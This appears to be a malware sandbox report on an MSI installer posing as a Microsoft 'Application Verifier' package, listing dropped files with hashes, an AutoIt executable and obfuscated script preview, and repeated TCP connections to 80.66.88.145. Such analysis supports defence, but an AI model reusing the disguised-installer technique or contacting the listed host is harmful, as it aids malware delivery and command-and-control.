                                                        MD5:D82B3FB861129C5D71F0CD2874F97216
                                                        SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                        SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                        SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Installer\SourceHash{229FD164-E132-4ADB-8998-1DB40BF25484}

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):1.163838104196163
                                                        Encrypted:false
                                                        SSDEEP:12:JSbX72FjjYAGiLIlHVRpZh/7777777777777777777777777vDHFs5QgAit/l0i5:JJYQI5ttyiF
                                                        MD5:F72F21050D099A517E88C0B9B95BD295
                                                        SHA1:FB927683D4D37559DFE5FF69609B5538620180E2
                                                        SHA-256:C5F264EB1A5BF5F5C0BE377CA6AEEE1D891B78A6A14623185C05425B6E2F25F6
                                                        SHA-512:BE41F6A86A13013A291CD9ABAC362DED02039FEAE472982B6AE0930D592ECA16CD549BEEC7C28D3CB65BC6FBE2EA016B062DE56DCD936B62A3D9603351CC35D3
                                                        Malicious:false
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Installer\inprogressinstallinfo.ipi

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):1.5513830917935394
                                                        Encrypted:false
                                                        SSDEEP:48:R8PhYuRc06WXJ0nT5a5Kft/p51ddSromrXvddSB2FrMsUk4:shY13nThf9l0qUUk
                                                        MD5:39D002620A197EA3B427C08D601946F3
                                                        SHA1:14AC8566875EFD30752AD110761404EBF50EBEBE
                                                        SHA-256:1C703D763A36E66B8DD0014B862B08F0334E2F66DEB2AB5906EB8EAC23421FA4
                                                        SHA-512:E294C9F7FE77E87FAF5C3E77A7F222E3DD4218B7125B3F566DAC6C8DC07682BC5C696F2B07A77196333153B7FCA556104169DADA59AD788079CB9C242C7C4AF2
                                                        Malicious:false
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Logs\DPX\setupact.log

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):933929
                                                        Entropy (8bit):4.386149343450665
                                                        Encrypted:false
                                                        SSDEEP:192:kKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcI:h
                                                        MD5:32EE505C5647886928E3D11C54BBA7E4
                                                        SHA1:FE772CBD72DDA16D080E59E10B50FD959E2F1E66
                                                        SHA-256:A7AD713CC2A21F50E2B827BA4FCB58FEEE88920AFA94168186271887C685665E
                                                        SHA-512:AB3FF4C69EDB64D2556B26E7546D6480F3067C2A7C16FAC02B590599927DD35EF7930E8B5690810E1FFDC1139A1896163AE91D81DBC17A584B4C75198F7D5B65
                                                        Malicious:false
                                                        Preview:.2019-06-27 00:56:09, Info DPX Started DPX phase: Resume and Download Job..2019-06-27 00:56:09, Info DPX Started DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Ended DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Started DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Ended DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX CJob::Resume completed with status: 0x0..2019-06-27 00:56:09, Info DPX Ended DPX phase: Resume and Download Job..2019-06-27 00:56:09, Info DPX Started DPX phase: Resume and Download Job..2019-06-27 00:56:09, Info DPX Started DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Ended DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info

                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):79122
                                                        Entropy (8bit):5.282175982976613
                                                        Encrypted:false
                                                        SSDEEP:192:jmXs969ozNSkk3peTBYeHt0tfoI9qsjl0urmwYyiLP:yXs9UogeWeH29qclhmwYyiz
                                                        MD5:0C40CFAD0BD2539422CAA8F57D8193EA
                                                        SHA1:DB665B3A82042D8CAD0C44B633C9C1D219AA1B14
                                                        SHA-256:BF4A8A2D82A6517F468C4471B0B2394A23EFC2CAEC4C0207924D9B7C3147292B
                                                        SHA-512:15B466CC7BF90D7A1CD8719930B878B13E960E300443846EC0B80D2EF0320E7E360B0CBE29BE06324CD293A6C524085A4C259619CE22C9F5C77CA8D4D6FCC020
                                                        Malicious:false
                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 03:22:38.143 [320]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.159 [320]: ngen returning 0x00000000..07/23/2020 03:22:38.222 [3748]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.237 [3748]: ngen returning 0x00000000..07/23/2020 03:22:38.284 [64]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.300 [64]:

                                                        C:\Windows\Temp\~DF0723A498380A03EB.TMP

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):1.5513830917935394
                                                        Encrypted:false
                                                        SSDEEP:48:R8PhYuRc06WXJ0nT5a5Kft/p51ddSromrXvddSB2FrMsUk4:shY13nThf9l0qUUk
                                                        MD5:39D002620A197EA3B427C08D601946F3
                                                        SHA1:14AC8566875EFD30752AD110761404EBF50EBEBE
                                                        SHA-256:1C703D763A36E66B8DD0014B862B08F0334E2F66DEB2AB5906EB8EAC23421FA4
                                                        SHA-512:E294C9F7FE77E87FAF5C3E77A7F222E3DD4218B7125B3F566DAC6C8DC07682BC5C696F2B07A77196333153B7FCA556104169DADA59AD788079CB9C242C7C4AF2
                                                        Malicious:false
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Temp\~DF932E910C2B5A509D.TMP

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Temp\~DFB46B19848F66B19D.TMP

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):1.2421153914563245
                                                        Encrypted:false
                                                        SSDEEP:48:5zQuWNveFXJLT5Q5Kft/p51ddSromrXvddSB2FrMsUk4:BQMzTff9l0qUUk
                                                        MD5:B1A8670826B5F77BC753BCADC495A828
                                                        SHA1:98D51716C6EBE6688D045C74A540A048ECBFFC0A
                                                        SHA-256:A11AF4BFF8668BD6C80241C2597A694CBD390AB752F6B37BEC7940D03EE6313A
                                                        SHA-512:17BC3BE2FF878149E9B7416160269A9CA59C69425CE3A48C1B3AC6833C7D55871239E7072586466671949EEDE8A5679CA1760ECB8099CF53FC38D2D28108441D
                                                        Malicious:false
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Temp\~DFB7831024D2CFB248.TMP

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):0.07110935099595517
                                                        Encrypted:false
                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOcd5Qxq1yTTkgVky6lit/:2F0i8n0itFzDHFs5Qgzit/
                                                        MD5:3903929F7674F66DDD40C1E48FE49788
                                                        SHA1:6F61DA648B2F115CFFC54AB5B7D759621AF3C3B7
                                                        SHA-256:D4930E8C3E3CCC91D00F852652EB2EDA8788F1810878386A06F48BA422EFDB66
                                                        SHA-512:0A279D3708A5B942E4F7DEC5C9A921668798CAE13F015150C852F80D326F49019A6B54DD4C56F2AF8EF70A5647C405996AF93A708184B9B479E06DCDF13BF896
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Temp\~DFB924194BEFC5CCB1.TMP

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):0.13751697623807846
                                                        Encrypted:false
                                                        SSDEEP:24:04D7sUMClNCwY+QJfAebfddipV72nddipVJV2BwGslrkg9SkuK52+kmKfKc5:04/sUwrfddSB2nddSromrX752JjfN5
                                                        MD5:330881AB07C50808A453FA9D40A83756
                                                        SHA1:E68EE2C966806A4C4E9E705653ED77B43053D68C
                                                        SHA-256:61075C0EA7272B6F7C4C4237A4156886F4569170CBC662B8CBA05584745FC90E
                                                        SHA-512:6D0F76A866468244A553055B597E2CCD8B1492F5E93CF9BE2B0C3810CE1DC01A6B7A41F783A327304270E83BA7AD49A6B473188A33B318E415938CE0085118EC
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Temp\~DFBA084C2D02A8EEAB.TMP

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\temp\AutoIt3.exe

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                        C:\temp\efghhgd.au3

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):775656
                                                        Entropy (8bit):6.502577735066428
                                                        Encrypted:false
                                                        SSDEEP:12288:pbyAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/NexP:RgLQQgogvXUnsPlU0ZNMIpc
                                                        MD5:1B524D03B27B94906C1A87B207E08179
                                                        SHA1:8FBAD6275708A69B764992B05126E053134FB9E9
                                                        SHA-256:1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
                                                        SHA-512:1E0F2AEA5DAA40B6CB7DF61BA86E0956356AB7B7ECFC9E2934BC85EEC8D42D3AEB32858DD0EAD24E82EF261A4120F6374263B7AF9256EB79A294D51273CC4F6E
                                                        Malicious:false
                                                        Preview:gljkbYNCNUfursQiNLDiefLJGttBjSzXQUkRysaJsXXdirQcwaLmzgXoNPNONKwsODeXMxFNCHdwkqrpLPKUWGVWZcMGbyYOHbJqwCXdIZwPTNCjYkYRchZQekJghDciYmDkJRShuIlyIzENsAKsbaYreZfsvOzjeocrnvFRJXTQjOCSUfQlJCfmvQOvlqiphrdcymZlTRXibmzduBSNrVizOIFwYNOMhQshljhIFSmVYVuNBygNXinpnkOBldfzWknVZZNNQnOvQllcPMFCbmdjlMHRBEPqigVkPqVvSWNfwWRQzpaYIZGVtjMBEezMpudtrKjNqrEtOohMPoLuBhzBOhSOhKNbHWnpNDClhITJVRWlHURJTqHpOPVOcYintOIrTlAzIIvyYEYwTDilBcBQecgMkQimvhkudUWAwPojfUXreOlXUKaVMsQTECkCDvyVnIlywfGqHADINlknXFyIcTFvnTKBzbOOZBjUVqWtVEwUjKaeoWIxMulHtTYrEHiyrsfyxPOSrIfnxioUZMTTPrJPicsPiaqWaWKnazcoxJhOAKrIRbPSDMiiUneEqcIHmVhzQdLlRXalhCjSdGEBLrbdZPsgZPrFTSeMxOdkijhiXcCzFpSrlwTQTpsDWyiqrjEQRCBQizWUrMSdTIHXwczMfQiTMtIPEmlNjWLIItLzEnmFWnAsYOUjoPTNSZdElnXWdgBqDJOOOvDJsAuMRVmzecAIzWqMusmWtXXwTLtuPfqsrLKEqrYepQbSMXdSPAYGsUpGGhKKvxOjIesJcFJqNJsrAXGYNHBhAdYCWaVRiGToHKIbbViGuJuTBWdLjBJUNmITdNgKyammmCuUzdwwljXarfgkyRKCoOlooltYDenkWAORfCLiqYPcsOndLipbFMLzWHJdyzXPOqBJOxvpQkLcOuGxAWHBFQwjAHbkeZfiyIOzQChoZztSICdbczrBypPfAlqsfBhakdfGPkMFhMvcTZhYffyL

                                                        \Device\ConDrv

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:ASCII text, with CRLF, CR, LF line terminators
                                                        Category:dropped
                                                        Size (bytes):264
                                                        Entropy (8bit):4.799289113892546
                                                        Encrypted:false
                                                        SSDEEP:6:zx3MmSLQHtBXVNsR+/HomwD0DIZJQiOC0n:zK/0HtBFNEqIBD0DYJQiI
                                                        MD5:95817EBB90389A8FD4D35E30A512A8ED
                                                        SHA1:DF6DF33A5BB54BC0640C449E226E7A6D4B2E08D1
                                                        SHA-256:B8DFD73944D25D6E6067A5C684571A20E19FB796AFE200A51449AF60D6D0A751
                                                        SHA-512:6786337517865661084B906DA28BE8915313DF5A14380066E9D30A3813E5FD9E0FBB9D9D559D408DCAA74E85E787FBEED8B69A7BC030064AB8F94816834D8A5E
                                                        Malicious:false
                                                        Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Adding files\Autoit3.exe to Extraction Queue..Adding files\UGtZgHHT.au3 to Extraction Queue....Expanding Files ........Expanding Files Complete .....2 files total...

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 3.3.14.5, Subject: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft, Keywords: Installer, Template: Intel;1033, Revision Number: {609A83EA-2275-4DEA-858D-BAEFF01E16D0}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                        Entropy (8bit):6.966994454036273
                                                        TrID:
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                        File name:15e7232gfN.msi
                                                        File size:1'921'024 bytes
                                                        MD5:247a8cc39384e93d258360a11381000f
                                                        SHA1:23893f035f8564dfea5030b9fdd54120d96072bb
                                                        SHA256:6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70
                                                        SHA512:336eca9569c0072e92ce16743f47ba9d6be06390a196f8e81654d6a42642ff5c99e423bfed00a8396bb0b037d5b54df8c3bde53757646e7e1a204f3be271c998
                                                        SSDEEP:24576:ftncpVGP4I9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRp:epUP59FBJZEH1X1arF0vN/nX
                                                        TLSH:A895AE4273B7F022FE9BD132565EEE06317C6C643262E56F239C3869D9301B2663D62D
                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:2d2e3797b32b2b99

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 26, 2023 14:01:05.669145107 CEST496907891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.681461096 CEST496919999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.712990999 CEST78914969080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.713164091 CEST496907891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.713223934 CEST496907891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.715008020 CEST99994969180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.789221048 CEST78914969080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.789556980 CEST78914969080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.789592028 CEST78914969080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.789676905 CEST496907891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.789733887 CEST496907891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.802953959 CEST496927891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.830910921 CEST78914969080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.843775988 CEST78914969280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.843946934 CEST496927891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.844060898 CEST496927891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.880832911 CEST78914969280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.880882978 CEST78914969280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.881006956 CEST78914969280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:05.881062984 CEST496927891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.881115913 CEST496927891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.881158113 CEST496927891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:05.914927959 CEST78914969280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:06.219929934 CEST496919999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:06.255738020 CEST99994969180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:06.766566038 CEST496919999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:06.810133934 CEST99994969180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:06.810844898 CEST496939999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:06.849031925 CEST99994969380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:07.360358000 CEST496939999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:07.393773079 CEST99994969380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:07.907313108 CEST496939999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:07.940556049 CEST99994969380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:08.058561087 CEST496949999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:08.099719048 CEST99994969480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:08.641751051 CEST496949999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:08.681644917 CEST99994969480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:09.235543013 CEST496949999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:09.269253969 CEST99994969480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:09.409147978 CEST496959999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:09.443409920 CEST99994969580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.048125029 CEST496959999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.081598997 CEST99994969580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.505003929 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.538868904 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.539031029 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.539072990 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.574842930 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.576016903 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.576062918 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.576136112 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.576136112 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.735654116 CEST496959999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.778984070 CEST99994969580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.321501017 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.348306894 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.355397940 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.386725903 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.386933088 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.422662973 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.430847883 CEST496989999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.465109110 CEST99994969880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.466541052 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.466737986 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.466835022 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.466973066 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.467170000 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.485348940 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.518922091 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:12.048228025 CEST496989999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:12.081741095 CEST99994969880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:12.735822916 CEST496989999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:12.769140005 CEST99994969880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:12.877263069 CEST496999999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:12.911011934 CEST99994969980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:13.548459053 CEST496999999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:13.584130049 CEST99994969980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:14.124579906 CEST496999999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:14.161727905 CEST99994969980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:14.284281015 CEST497009999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:14.322448969 CEST99994970080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:14.829849958 CEST497009999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:14.874561071 CEST99994970080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.376637936 CEST497009999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.416196108 CEST99994970080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.526289940 CEST497019999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.554184914 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.559758902 CEST99994970180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.589715004 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.589864969 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.589994907 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.624844074 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.624886990 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.625071049 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.625096083 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.625353098 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.636919975 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.677680969 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.685345888 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.719986916 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.720359087 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.720359087 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.758169889 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.758243084 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.758449078 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.758537054 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.760215044 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.770390987 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.813632965 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:16.064382076 CEST497019999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:16.097584963 CEST99994970180.66.88.145192.168.2.4
